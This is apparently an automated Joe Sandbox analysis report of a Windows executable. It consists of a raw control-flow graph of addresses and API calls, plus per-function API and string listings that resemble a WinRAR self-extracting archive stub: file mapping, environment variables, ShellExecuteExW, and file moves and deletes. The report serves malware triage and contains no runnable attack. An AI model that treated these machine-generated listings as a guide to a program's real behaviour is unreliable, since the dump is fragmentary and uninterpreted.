10b5b8 24039->24043 24040 10bdf5 98 API calls 24040->24037 24054 10bdf5 98 API calls 24041->24054 24083 10b797 24041->24083 24047 10b136 24042->24047 24048 fddd1 53 API calls 24043->24048 24044 10b0e6 24158 fa04f 24044->24158 24052 10b6c2 SetDlgItemTextW 24046->24052 24053 10cb5a 16 API calls 24047->24053 24048->24055 24050 10b174 GetLastError 24051 10b17f 24050->24051 24164 10a322 SetCurrentDirectoryW 24051->24164 24060 fddd1 53 API calls 24052->24060 24053->24044 24061 10b6fa 24054->24061 24056 10b847 24057 10b850 EnableWindow 24056->24057 24058 10b859 24056->24058 24057->24058 24062 10b876 24058->24062 24272 f12c8 GetDlgItem EnableWindow 24058->24272 24064 10b6d6 SetDlgItemTextW 24060->24064 24070 10b70c 24061->24070 24084 10b731 24061->24084 24069 10b89d 24062->24069 24076 10b895 SendMessageW 24062->24076 24063 10b195 24067 10b1ac 24063->24067 24068 10b19e GetLastError 24063->24068 24064->24041 24066 10b78a 24072 10bdf5 98 API calls 24066->24072 24079 10b237 24067->24079 24081 10b1c4 GetTickCount 24067->24081 24125 10b227 24067->24125 24068->24067 24069->24055 24077 fddd1 53 API calls 24069->24077 24270 109635 32 API calls 24070->24270 24071 10b86c 24273 f12c8 GetDlgItem EnableWindow 24071->24273 24072->24083 24074 10b725 24074->24084 24076->24069 24078 10b8b6 SetDlgItemTextW 24077->24078 24078->24055 24086 10b407 24079->24086 24087 10b24f GetModuleFileNameW 24079->24087 24080 10b46c 24173 f12e6 GetDlgItem ShowWindow 24080->24173 24088 f400a _swprintf 51 API calls 24081->24088 24082 10b825 24271 109635 32 API calls 24082->24271 24083->24056 24083->24082 24090 fddd1 53 API calls 24083->24090 24084->24066 24091 10bdf5 98 API calls 24084->24091 24086->23998 24099 fddd1 53 API calls 24086->24099 24264 feb3a 80 API calls 24087->24264 24094 10b1dd 24088->24094 24090->24083 24096 10b75f 24091->24096 24092 10b47c 24174 f12e6 GetDlgItem ShowWindow 24092->24174 24165 f971e 24094->24165 24095 10b844 24095->24056 24096->24066 24100 10b768 DialogBoxParamW 24096->24100 24098 
10b275 24102 f400a _swprintf 51 API calls 24098->24102 24103 10b41b 24099->24103 24100->23998 24100->24066 24101 10b486 24106 fddd1 53 API calls 24101->24106 24107 10b297 CreateFileMappingW 24102->24107 24104 f400a _swprintf 51 API calls 24103->24104 24112 10b439 24104->24112 24109 10b490 SetDlgItemTextW 24106->24109 24110 10b2f9 GetCommandLineW 24107->24110 24111 10b376 __vsnwprintf_l 24107->24111 24108 10b203 24113 10b215 24108->24113 24114 10b20a GetLastError 24108->24114 24175 f12e6 GetDlgItem ShowWindow 24109->24175 24118 10b30a 24110->24118 24115 10b381 ShellExecuteExW 24111->24115 24124 fddd1 53 API calls 24112->24124 24120 f9653 79 API calls 24113->24120 24114->24113 24138 10b39e 24115->24138 24117 10b4a2 SetDlgItemTextW GetDlgItem 24121 10b4d7 24117->24121 24122 10b4bf GetWindowLongW SetWindowLongW 24117->24122 24265 10ab2e SHGetMalloc 24118->24265 24120->24125 24176 10bdf5 24121->24176 24122->24121 24123 10b326 24266 10ab2e SHGetMalloc 24123->24266 24124->23998 24125->24079 24125->24080 24129 10b332 24267 10ab2e SHGetMalloc 24129->24267 24130 10b3e1 24130->24086 24137 10b3f7 UnmapViewOfFile CloseHandle 24130->24137 24131 10bdf5 98 API calls 24133 10b4f3 24131->24133 24201 10d0f5 24133->24201 24134 10b33e 24268 fecad 80 API calls ___scrt_get_show_window_mode 24134->24268 24137->24086 24138->24130 24141 10b3cd Sleep 24138->24141 24140 10b355 MapViewOfFile 24140->24111 24141->24130 24141->24138 24142 10bdf5 98 API calls 24146 10b519 24142->24146 24143 10b542 24269 f12c8 GetDlgItem EnableWindow 24143->24269 24145->23998 24145->24020 24146->24143 24147 10bdf5 98 API calls 24146->24147 24147->24143 24149 f136d 24148->24149 24150 f1314 24148->24150 24275 fda71 GetWindowLongW SetWindowLongW 24149->24275 24152 f137a 24150->24152 24274 fda98 62 API calls 2 library calls 24150->24274 24152->23989 24152->23990 24152->24055 24154 f1336 24154->24152 24155 f1349 GetDlgItem 24154->24155 24155->24152 24156 f1359 24155->24156 24156->24152 24157 f135f SetWindowTextW 
24156->24157 24157->24152 24161 fa059 24158->24161 24159 fa0ea 24160 fa207 9 API calls 24159->24160 24162 fa113 24159->24162 24160->24162 24161->24159 24161->24162 24276 fa207 24161->24276 24162->24050 24162->24051 24164->24063 24166 f9728 24165->24166 24167 f9792 CreateFileW 24166->24167 24168 f9786 24166->24168 24167->24168 24169 f97e4 24168->24169 24170 fb66c 2 API calls 24168->24170 24169->24108 24171 f97cb 24170->24171 24171->24169 24172 f97cf CreateFileW 24171->24172 24172->24169 24173->24092 24174->24101 24175->24117 24177 10bdff __EH_prolog 24176->24177 24178 10b4e5 24177->24178 24179 10aa36 ExpandEnvironmentStringsW 24177->24179 24178->24131 24180 10be36 _wcsrchr 24179->24180 24180->24178 24182 10aa36 ExpandEnvironmentStringsW 24180->24182 24183 10c11d SetWindowTextW 24180->24183 24186 1135de 22 API calls 24180->24186 24188 10bf0b SetFileAttributesW 24180->24188 24193 10c2e7 GetDlgItem SetWindowTextW SendMessageW 24180->24193 24196 10c327 SendMessageW 24180->24196 24297 1017ac CompareStringW 24180->24297 24298 109da4 GetCurrentDirectoryW 24180->24298 24300 fa52a 7 API calls 24180->24300 24301 fa4b3 FindClose 24180->24301 24302 10ab9a 76 API calls ___std_exception_copy 24180->24302 24182->24180 24183->24180 24186->24180 24190 10bfc5 GetFileAttributesW 24188->24190 24200 10bf25 ___scrt_get_show_window_mode 24188->24200 24190->24180 24191 10bfd7 DeleteFileW 24190->24191 24191->24180 24194 10bfe8 24191->24194 24193->24180 24195 f400a _swprintf 51 API calls 24194->24195 24197 10c008 GetFileAttributesW 24195->24197 24196->24180 24197->24194 24198 10c01d MoveFileW 24197->24198 24198->24180 24199 10c035 MoveFileExW 24198->24199 24199->24180 24200->24180 24200->24190 24299 fb4f7 52 API calls 2 library calls 24200->24299 24202 10d0ff __EH_prolog 24201->24202 24303 ffead 24202->24303 24204 10d130 24307 f5c59 24204->24307 24206 10d14e 24311 f7c68 24206->24311 24210 10d1a1 24328 f7cfb 24210->24328 24212 10b504 24212->24142 24214 10cd38 24213->24214 24215 109d1a 4 API 
calls 24214->24215 24216 10cd3d 24215->24216 24217 10cd45 GetWindow 24216->24217 24218 10b5d1 24216->24218 24217->24218 24221 10cd65 24217->24221 24218->23995 24218->23996 24219 10cd72 GetClassNameW 24762 1017ac CompareStringW 24219->24762 24221->24218 24221->24219 24222 10cd96 GetWindowLongW 24221->24222 24223 10cdfa GetWindow 24221->24223 24222->24223 24224 10cda6 SendMessageW 24222->24224 24223->24218 24223->24221 24224->24223 24225 10cdbc GetObjectW 24224->24225 24763 109d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24225->24763 24227 10cdd3 24764 109d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24227->24764 24765 109f5d 8 API calls ___scrt_get_show_window_mode 24227->24765 24230 10cde4 SendMessageW DeleteObject 24230->24223 24231->24009 24233 10a2e8 24232->24233 24234 10a30d 24232->24234 24766 1017ac CompareStringW 24233->24766 24236 10a312 SHAutoComplete 24234->24236 24237 10a31b 24234->24237 24236->24237 24240 10a7c3 24237->24240 24238 10a2fb 24238->24234 24239 10a2ff FindWindowExW 24238->24239 24239->24234 24241 10a7cd __EH_prolog 24240->24241 24242 f1380 82 API calls 24241->24242 24243 10a7ef 24242->24243 24767 f1f4f 24243->24767 24246 10a818 24249 f1951 126 API calls 24246->24249 24247 10a809 24248 f1631 84 API calls 24247->24248 24250 10a814 24248->24250 24252 10a83a __vsnwprintf_l ___std_exception_copy 24249->24252 24250->24037 24250->24040 24251 f1631 84 API calls 24251->24250 24252->24250 24252->24251 24253->24019 24255 10ac74 5 API calls 24254->24255 24256 10cb66 GetDlgItem 24255->24256 24257 10cb88 24256->24257 24258 10cbbc SendMessageW SendMessageW 24256->24258 24263 10cb93 ShowWindow SendMessageW SendMessageW 24257->24263 24259 10cc17 SendMessageW SendMessageW SendMessageW 24258->24259 24260 10cbf8 24258->24260 24261 10cc4a SendMessageW 24259->24261 24262 10cc6d SendMessageW 24259->24262 24260->24259 24261->24262 24262->24044 24263->24258 24264->24098 24265->24123 24266->24129 24267->24134 24268->24140 24269->24145 24270->24074 24271->24095 
24272->24071 24273->24062 24274->24154 24275->24152 24277 fa214 24276->24277 24278 fa238 24277->24278 24279 fa22b CreateDirectoryW 24277->24279 24280 fa180 4 API calls 24278->24280 24279->24278 24282 fa26b 24279->24282 24281 fa23e 24280->24281 24283 fa27e GetLastError 24281->24283 24284 fb66c 2 API calls 24281->24284 24286 fa27a 24282->24286 24289 fa444 24282->24289 24283->24286 24287 fa254 24284->24287 24286->24161 24287->24283 24288 fa258 CreateDirectoryW 24287->24288 24288->24282 24288->24283 24290 10e360 24289->24290 24291 fa451 SetFileAttributesW 24290->24291 24292 fa467 24291->24292 24293 fa494 24291->24293 24294 fb66c 2 API calls 24292->24294 24293->24286 24295 fa47b 24294->24295 24295->24293 24296 fa47f SetFileAttributesW 24295->24296 24296->24293 24297->24180 24298->24180 24299->24200 24300->24180 24301->24180 24302->24180 24304 ffeba 24303->24304 24332 f1789 24304->24332 24306 ffed2 24306->24204 24308 ffead 24307->24308 24309 f1789 76 API calls 24308->24309 24310 ffed2 24309->24310 24310->24206 24312 f7c72 __EH_prolog 24311->24312 24349 fc827 24312->24349 24314 f7c8d 24315 10e24a new 8 API calls 24314->24315 24316 f7cb7 24315->24316 24355 10440b 24316->24355 24319 f7ddf 24320 f7de9 24319->24320 24322 f7e53 24320->24322 24384 fa4c6 24320->24384 24324 f7ec4 24322->24324 24327 fa4c6 8 API calls 24322->24327 24362 f837f 24322->24362 24323 f7f06 24323->24210 24324->24323 24390 f6dc1 74 API calls 24324->24390 24327->24322 24329 f7d09 24328->24329 24331 f7d10 24328->24331 24330 101acf 84 API calls 24329->24330 24330->24331 24333 f179f 24332->24333 24344 f17fa __vsnwprintf_l 24332->24344 24334 f17c8 24333->24334 24345 f6e91 74 API calls __vswprintf_c_l 24333->24345 24336 f1827 24334->24336 24341 f17e7 ___std_exception_copy 24334->24341 24338 1135de 22 API calls 24336->24338 24337 f17be 24346 f6efd 75 API calls 24337->24346 24340 f182e 24338->24340 24340->24344 24348 f6efd 75 API calls 24340->24348 24341->24344 24347 f6efd 75 API calls 24341->24347 24344->24306 
24345->24337 24346->24334 24347->24344 24348->24344 24350 fc831 __EH_prolog 24349->24350 24351 10e24a new 8 API calls 24350->24351 24352 fc874 24351->24352 24353 10e24a new 8 API calls 24352->24353 24354 fc898 24353->24354 24354->24314 24356 104415 __EH_prolog 24355->24356 24357 10e24a new 8 API calls 24356->24357 24358 104431 24357->24358 24359 f7ce6 24358->24359 24361 1006ba 78 API calls 24358->24361 24359->24319 24361->24359 24363 f8389 __EH_prolog 24362->24363 24391 f1380 24363->24391 24365 f83a4 24399 f9ef7 24365->24399 24371 f83d3 24519 f1631 24371->24519 24372 f83cf 24372->24371 24380 fa4c6 8 API calls 24372->24380 24383 f846e 24372->24383 24523 fbac4 CompareStringW 24372->24523 24375 f84ce 24422 f1f00 24375->24422 24380->24372 24381 f84d9 24381->24371 24426 f3aac 24381->24426 24436 f857b 24381->24436 24418 f8517 24383->24418 24385 fa4db 24384->24385 24386 fa4df 24385->24386 24750 fa5f4 24385->24750 24386->24320 24388 fa4ef 24388->24386 24389 fa4f4 FindClose 24388->24389 24389->24386 24390->24323 24392 f1385 __EH_prolog 24391->24392 24393 fc827 8 API calls 24392->24393 24394 f13bd 24393->24394 24395 10e24a new 8 API calls 24394->24395 24398 f1416 ___scrt_get_show_window_mode 24394->24398 24396 f1403 24395->24396 24397 fb07d 82 API calls 24396->24397 24396->24398 24397->24398 24398->24365 24400 f9f0e 24399->24400 24401 f83ba 24400->24401 24525 f6f5d 76 API calls 24400->24525 24401->24371 24403 f19a6 24401->24403 24404 f19b0 __EH_prolog 24403->24404 24414 f1a00 24404->24414 24417 f19e5 24404->24417 24526 f709d 24404->24526 24406 f1b50 24529 f6dc1 74 API calls 24406->24529 24408 f3aac 97 API calls 24412 f1bb3 24408->24412 24409 f1b60 24409->24408 24409->24417 24410 f1bff 24416 f1c32 24410->24416 24410->24417 24530 f6dc1 74 API calls 24410->24530 24412->24410 24413 f3aac 97 API calls 24412->24413 24413->24412 24414->24406 24414->24409 24414->24417 24415 f3aac 97 API calls 24415->24416 24416->24415 24416->24417 24417->24372 24419 f8524 24418->24419 24548 100c26 
GetSystemTime SystemTimeToFileTime 24419->24548 24421 f8488 24421->24375 24524 101359 72 API calls 24421->24524 24423 f1f05 __EH_prolog 24422->24423 24424 f1f39 24423->24424 24550 f1951 24423->24550 24424->24381 24427 f3abc 24426->24427 24428 f3ab8 24426->24428 24429 f3ae9 24427->24429 24430 f3af7 24427->24430 24428->24381 24431 f3b29 24429->24431 24684 f3281 85 API calls 3 library calls 24429->24684 24685 f27e8 97 API calls 3 library calls 24430->24685 24431->24381 24434 f3af5 24434->24431 24686 f204e 74 API calls 24434->24686 24437 f8585 __EH_prolog 24436->24437 24438 f85be 24437->24438 24446 f85c2 24437->24446 24709 1084bd 99 API calls 24437->24709 24439 f85e7 24438->24439 24442 f867a 24438->24442 24438->24446 24440 f8609 24439->24440 24439->24446 24710 f7b66 151 API calls 24439->24710 24440->24446 24711 1084bd 99 API calls 24440->24711 24442->24446 24687 f5e3a 24442->24687 24446->24381 24447 f8705 24447->24446 24693 f826a 24447->24693 24449 f8875 24451 fa4c6 8 API calls 24449->24451 24452 f88e0 24449->24452 24451->24452 24697 f7d6c 24452->24697 24454 fc991 80 API calls 24458 f893b _memcmp 24454->24458 24455 f8a70 24456 f8b43 24455->24456 24463 f8abf 24455->24463 24461 f8b9e 24456->24461 24473 f8b4e 24456->24473 24457 f8a69 24714 f1f94 74 API calls 24457->24714 24458->24446 24458->24454 24458->24455 24458->24457 24712 f8236 82 API calls 24458->24712 24713 f1f94 74 API calls 24458->24713 24471 f8b30 24461->24471 24717 f80ea 96 API calls 24461->24717 24462 f8b9c 24465 f9653 79 API calls 24462->24465 24466 fa180 4 API calls 24463->24466 24463->24471 24464 f9653 79 API calls 24464->24446 24465->24446 24470 f8af7 24466->24470 24468 f8c74 24474 faa88 8 API calls 24468->24474 24469 f8c09 24469->24468 24472 f9989 GetFileType 24469->24472 24509 f91c1 ___InternalCxxFrameHandler 24469->24509 24470->24471 24715 f9377 96 API calls 24470->24715 24471->24462 24471->24469 24475 f8c4c 24472->24475 24473->24462 24716 f7f26 100 API calls ___InternalCxxFrameHandler 24473->24716 
24477 f8cc3 24474->24477 24475->24468 24718 f1f94 74 API calls 24475->24718 24479 faa88 8 API calls 24477->24479 24483 f8cd9 24479->24483 24481 f8c62 24719 f7061 75 API calls 24481->24719 24484 f8d9c 24483->24484 24720 f9b21 SetFilePointer GetLastError SetEndOfFile 24483->24720 24485 f8efd 24484->24485 24486 f8df7 24484->24486 24487 f8e27 24485->24487 24489 f8f0f 24485->24489 24490 f8f23 24485->24490 24488 f8e69 24486->24488 24492 f8e07 24486->24492 24512 f904b 24487->24512 24726 f1f94 74 API calls 24487->24726 24491 f826a CharUpperW 24488->24491 24495 f92e6 121 API calls 24489->24495 24496 102c42 75 API calls 24490->24496 24493 f8e84 24491->24493 24494 f8e4d 24492->24494 24499 f8e15 24492->24499 24493->24487 24502 f8ead 24493->24502 24503 f8eb4 24493->24503 24494->24487 24722 f7907 108 API calls 24494->24722 24495->24487 24498 f8f3c 24496->24498 24725 1028f1 121 API calls 24498->24725 24721 f1f94 74 API calls 24499->24721 24723 f7698 84 API calls ___InternalCxxFrameHandler 24502->24723 24724 f9224 94 API calls __EH_prolog 24503->24724 24508 f9156 24508->24509 24511 fa444 4 API calls 24508->24511 24509->24464 24510 f9104 24704 f9d62 24510->24704 24513 f91b1 24511->24513 24512->24508 24512->24509 24512->24510 24703 f9ebf SetEndOfFile 24512->24703 24513->24509 24727 f1f94 74 API calls 24513->24727 24516 f914b 24517 f96d0 75 API calls 24516->24517 24517->24508 24520 f1643 24519->24520 24742 fc8ca 24520->24742 24523->24372 24524->24375 24525->24401 24531 f16d2 24526->24531 24528 f70b9 24528->24414 24529->24417 24530->24416 24532 f16e8 24531->24532 24543 f1740 __vsnwprintf_l 24531->24543 24533 f1711 24532->24533 24544 f6e91 74 API calls __vswprintf_c_l 24532->24544 24535 f1767 24533->24535 24540 f172d ___std_exception_copy 24533->24540 24537 1135de 22 API calls 24535->24537 24536 f1707 24545 f6efd 75 API calls 24536->24545 24539 f176e 24537->24539 24539->24543 24547 f6efd 75 API calls 24539->24547 24540->24543 24546 f6efd 75 API calls 24540->24546 24543->24528 
24544->24536 24545->24533 24546->24543 24547->24543 24549 100c56 __vsnwprintf_l 24548->24549 24549->24421 24551 f195d 24550->24551 24552 f1961 24550->24552 24551->24424 24554 f1896 24552->24554 24555 f18a8 24554->24555 24556 f18e5 24554->24556 24557 f3aac 97 API calls 24555->24557 24562 f3f18 24556->24562 24558 f18c8 24557->24558 24558->24551 24566 f3f21 24562->24566 24563 f3aac 97 API calls 24563->24566 24564 f1906 24564->24558 24567 f1e00 24564->24567 24566->24563 24566->24564 24579 10067c 24566->24579 24568 f1e0a __EH_prolog 24567->24568 24587 f3b3d 24568->24587 24570 f1e34 24571 f16d2 76 API calls 24570->24571 24573 f1ebb 24570->24573 24572 f1e4b 24571->24572 24615 f1849 76 API calls 24572->24615 24573->24558 24575 f1e63 24577 f1e6f 24575->24577 24616 10137a MultiByteToWideChar 24575->24616 24617 f1849 76 API calls 24577->24617 24580 100683 24579->24580 24581 10069e 24580->24581 24585 f6e8c RaiseException Concurrency::cancel_current_task 24580->24585 24583 1006af SetThreadExecutionState 24581->24583 24586 f6e8c RaiseException Concurrency::cancel_current_task 24581->24586 24583->24566 24585->24581 24586->24583 24588 f3b47 __EH_prolog 24587->24588 24589 f3b5d 24588->24589 24590 f3b79 24588->24590 24646 f6dc1 74 API calls 24589->24646 24591 f3dc2 24590->24591 24595 f3ba5 24590->24595 24663 f6dc1 74 API calls 24591->24663 24594 f3b68 24594->24570 24595->24594 24618 102c42 24595->24618 24597 f3c26 24598 f3cb1 24597->24598 24614 f3c1d 24597->24614 24649 fc991 24597->24649 24631 faa88 24598->24631 24599 f3c22 24599->24597 24648 f2034 76 API calls 24599->24648 24600 f3bf4 24600->24597 24600->24599 24601 f3c12 24600->24601 24647 f6dc1 74 API calls 24601->24647 24603 f3cc4 24608 f3d3e 24603->24608 24609 f3d48 24603->24609 24635 f92e6 24608->24635 24655 1028f1 121 API calls 24609->24655 24612 f3d46 24612->24614 24656 f1f94 74 API calls 24612->24656 24657 101acf 24614->24657 24615->24575 24616->24577 24617->24573 24619 102c51 24618->24619 24621 102c5b 24618->24621 24664 
f6efd 75 API calls 24619->24664 24623 102ca2 ___std_exception_copy 24621->24623 24624 102c9d Concurrency::cancel_current_task 24621->24624 24630 102cfd ___scrt_get_show_window_mode 24621->24630 24622 102da9 Concurrency::cancel_current_task 24667 11157a RaiseException 24622->24667 24623->24622 24625 102cd9 24623->24625 24623->24630 24666 11157a RaiseException 24624->24666 24665 102b7b 75 API calls 3 library calls 24625->24665 24629 102dc1 24630->24600 24632 faa95 24631->24632 24634 faa9f 24631->24634 24633 10e24a new 8 API calls 24632->24633 24633->24634 24634->24603 24636 f92f0 __EH_prolog 24635->24636 24668 f7dc6 24636->24668 24639 f709d 76 API calls 24640 f9302 24639->24640 24671 fca6c 24640->24671 24642 f935c 24642->24612 24644 fca6c 114 API calls 24645 f9314 24644->24645 24645->24642 24645->24644 24680 fcc51 97 API calls __vsnwprintf_l 24645->24680 24646->24594 24647->24614 24648->24597 24650 fc9c4 24649->24650 24651 fc9b2 24649->24651 24682 f6249 80 API calls 24650->24682 24681 f6249 80 API calls 24651->24681 24654 fc9bc 24654->24598 24655->24612 24656->24614 24658 101ad9 24657->24658 24659 101af2 24658->24659 24662 101b06 24658->24662 24683 10075b 84 API calls 24659->24683 24661 101af9 24661->24662 24663->24594 24664->24621 24665->24630 24666->24622 24667->24629 24669 facf5 GetVersionExW 24668->24669 24670 f7dcb 24669->24670 24670->24639 24677 fca82 __vsnwprintf_l 24671->24677 24672 fcbf7 24673 fcc1f 24672->24673 24674 fca0b 6 API calls 24672->24674 24675 10067c SetThreadExecutionState RaiseException 24673->24675 24674->24673 24678 fcbee 24675->24678 24676 1084bd 99 API calls 24676->24677 24677->24672 24677->24676 24677->24678 24679 fab70 89 API calls 24677->24679 24678->24645 24679->24677 24680->24645 24681->24654 24682->24654 24683->24661 24684->24434 24685->24434 24686->24431 24688 f5e4a 24687->24688 24728 f5d67 24688->24728 24690 f5eb5 24690->24447 24692 f5e7d 24692->24690 24733 fad65 CharUpperW CompareStringW 24692->24733 24694 f8289 24693->24694 24739 
10179d CharUpperW 24694->24739 24696 f8333 24696->24449 24698 f7d7b 24697->24698 24699 f7dbb 24698->24699 24740 f7043 74 API calls 24698->24740 24699->24458 24701 f7db3 24741 f6dc1 74 API calls 24701->24741 24703->24510 24705 f9d73 24704->24705 24707 f9d82 24704->24707 24706 f9d79 FlushFileBuffers 24705->24706 24705->24707 24706->24707 24708 f9dfb SetFileTime 24707->24708 24708->24516 24709->24438 24710->24440 24711->24446 24712->24458 24713->24458 24714->24455 24715->24471 24716->24462 24717->24471 24718->24481 24719->24468 24720->24484 24721->24487 24722->24487 24723->24487 24724->24487 24725->24487 24726->24512 24727->24509 24734 f5c64 24728->24734 24730 f5d88 24730->24692 24732 f5c64 2 API calls 24732->24730 24733->24692 24737 f5c6e 24734->24737 24735 f5d56 24735->24730 24735->24732 24737->24735 24738 fad65 CharUpperW CompareStringW 24737->24738 24738->24737 24739->24696 24740->24701 24741->24699 24743 fc8db 24742->24743 24748 fa90e 84 API calls 24743->24748 24745 fc90d 24749 fa90e 84 API calls 24745->24749 24747 fc918 24748->24745 24749->24747 24751 fa5fe 24750->24751 24752 fa691 FindNextFileW 24751->24752 24753 fa621 FindFirstFileW 24751->24753 24754 fa69c GetLastError 24752->24754 24755 fa6b0 24752->24755 24756 fa638 24753->24756 24757 fa675 24753->24757 24754->24755 24755->24757 24758 fb66c 2 API calls 24756->24758 24757->24388 24759 fa64d 24758->24759 24760 fa66a GetLastError 24759->24760 24761 fa651 FindFirstFileW 24759->24761 24760->24757 24761->24757 24761->24760 24762->24221 24763->24227 24764->24227 24765->24230 24766->24238 24768 f9ef7 76 API calls 24767->24768 24769 f1f5b 24768->24769 24770 f19a6 97 API calls 24769->24770 24773 f1f78 24769->24773 24771 f1f68 24770->24771 24771->24773 24774 f6dc1 74 API calls 24771->24774 24773->24246 24773->24247 24774->24773 24827 10b8e0 93 API calls _swprintf 24828 108ce0 6 API calls 24831 1216e0 CloseHandle

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 001000CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001000E4
                                                                                                • Part of subcall function 001000CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001000F6
                                                                                                • Part of subcall function 001000CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00100127
                                                                                                • Part of subcall function 00109DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00109DAC
                                                                                                • Part of subcall function 0010A335: OleInitialize.OLE32(00000000), ref: 0010A34E
                                                                                                • Part of subcall function 0010A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0010A385
                                                                                                • Part of subcall function 0010A335: SHGetMalloc.SHELL32(00138430), ref: 0010A38F
                                                                                                • Part of subcall function 001013B3: GetCPInfo.KERNEL32(00000000,?), ref: 001013C4
                                                                                                • Part of subcall function 001013B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001013D8
                                                                                              • GetCommandLineW.KERNEL32 ref: 0010D61C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0010D643
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0010D654
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0010D68E
                                                                                                • Part of subcall function 0010D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0010D29D
                                                                                                • Part of subcall function 0010D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0010D2D9
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0010D697
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,0014DC90,00000800), ref: 0010D6B2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0014DC90), ref: 0010D6BE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0010D6C9
                                                                                              • _swprintf.LIBCMT ref: 0010D708
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0010D71A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0010D721
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0010D738
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0010D789
                                                                                              • Sleep.KERNEL32(?), ref: 0010D7B7
                                                                                              • DeleteObject.GDI32 ref: 0010D7F0
                                                                                              • DeleteObject.GDI32(?), ref: 0010D800
                                                                                              • CloseHandle.KERNEL32 ref: 0010D843
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 788466649-3743209390

                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(0010AE4D,PNG,?,?,?,0010AE4D,00000066), ref: 00109E2E
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0010AE4D,00000066), ref: 00109E46
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E59
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,0010AE4D,00000066), ref: 00109E64
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0010AE4D,00000066), ref: 00109E82
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00109E93
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00109EB7
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00109EFC
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00109F1B
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00109F22
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 3656887471-364855578

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA628
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA65E
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA66A
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA692
                                                                                              • GetLastError.KERNEL32(?,?,?,?,000FA4EF,000000FF,?,?), ref: 000FA69E
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                              • String ID:
                                                                                              • API String ID: 869497890-0
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002,00000000), ref: 0011755E
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00117513,00000000,0012BAD8,0000000C,0011766A,00000000,00000002,00000000), ref: 00117565
                                                                                              • ExitProcess.KERNEL32 ref: 00117577
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3004599000-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010AEE5
